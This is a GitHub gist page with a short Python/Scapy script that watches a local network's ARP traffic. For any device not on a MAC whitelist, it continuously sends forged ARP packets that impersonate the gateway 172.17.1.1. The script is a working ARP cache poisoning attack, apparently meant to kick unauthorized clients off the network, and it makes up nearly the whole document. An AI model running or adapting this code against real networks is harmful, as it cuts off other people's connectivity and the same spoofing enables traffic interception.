Last active
February 19, 2021 16:44
-
-
Save firedent/a3f18054fa955e48e0792f3465033120 to your computer and use it in GitHub Desktop.
sniff unauthorized client and attack with ARP poisoning.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#! /usr/bin/env python | |
from scapy.all import * | |
from scapy.layers.l2 import ARP, Ether | |
import time | |
import threading | |
# 合并通知 | |
notic_inter = 600 | |
# 攻击持续时间(秒) | |
attack_reset = 30 | |
watchlist = dict() | |
# MAC白名单 | |
whitelist = set(['84:5d:d7:ff:ff:ff', | |
'ac:bc:32:ff:ff:ff', | |
'a6:8e:80:ff:ff:ff', | |
'18:f6:43:ff:ff:ff', | |
'8e:09:d6:ff:ff:ff', | |
'0a:42:ef:ff:ff:ff']) | |
# 攻击函数 ref: https://scapy.readthedocs.io/en/latest/usage.html?highlight=arp#arp-cache-poisoning | |
def arp_cache_poisoning(clientMAC, clientIP): | |
# 设备消失一段时间后停止攻击 | |
while time.time() - watchlist.get(clientMAC) < attack_reset: | |
sendp(Ether(dst=clientMAC) / ARP(op="who-has", psrc='172.17.1.1', pdst=clientIP), | |
inter=1, verbose=0) | |
# sniff的回调函数 | |
def arp_monitor_callback(pkt): | |
if ARP in pkt and pkt[ARP].op in (1, 2) and pkt[ARP].hwsrc not in whitelist: #who-has or is-at | |
t = time.time() | |
last_seen = watchlist.get(pkt[ARP].hwsrc, 0) | |
watchlist[pkt[ARP].hwsrc] = t | |
# 距离上次短线不足一个攻击周期,不启动新攻击 | |
if t - last_seen > attack_reset: | |
new_thread = threading.Thread(target=arp_cache_poisoning, name=f'attack_{pkt[ARP].hwsrc}', args=(pkt[ARP].hwsrc, pkt[ARP].psrc)) | |
new_thread.start() | |
# 十分钟以内只通知一次 | |
if t - last_seen > notic_inter: | |
local_t = time.localtime(time.time()) | |
return pkt.sprintf(f"{local_t.tm_hour:02}:{local_t.tm_min:02}:{local_t.tm_sec:02} %ARP.hwsrc% %ARP.psrc%") | |
print("LINK START...") | |
# ref: https://scapy.readthedocs.io/en/latest/usage.html#simplistic-arp-monitor | |
sniff(prn=arp_monitor_callback, filter="arp", store=0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment